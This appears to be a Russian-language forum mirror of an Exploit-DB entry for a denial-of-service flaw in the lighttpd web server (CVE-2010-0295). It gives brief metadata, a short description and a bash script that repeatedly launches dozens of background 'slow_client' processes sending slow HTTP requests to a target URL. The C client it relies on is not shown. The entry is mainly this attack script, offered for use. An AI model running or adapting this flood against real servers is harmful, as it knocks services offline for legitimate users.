- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33591
- Проверка EDB
-
- Пройдено
- Автор
- LI MING
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2010-0295
- Дата публикации
- 2010-02-02
Код:
source: https://www.securityfocus.com/bid/38036/info
The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.
##slow_test.sh
for ((j=0;j<1000;j++)) do
for ((i=0; i<50; i++)) do
## slow_client is a C program which sends a HTTP request very slowly
./slow_client http://www.example.com/>/dev/null 2>/dev/null &
done&
sleep 3
done
- Источник
- www.exploit-db.com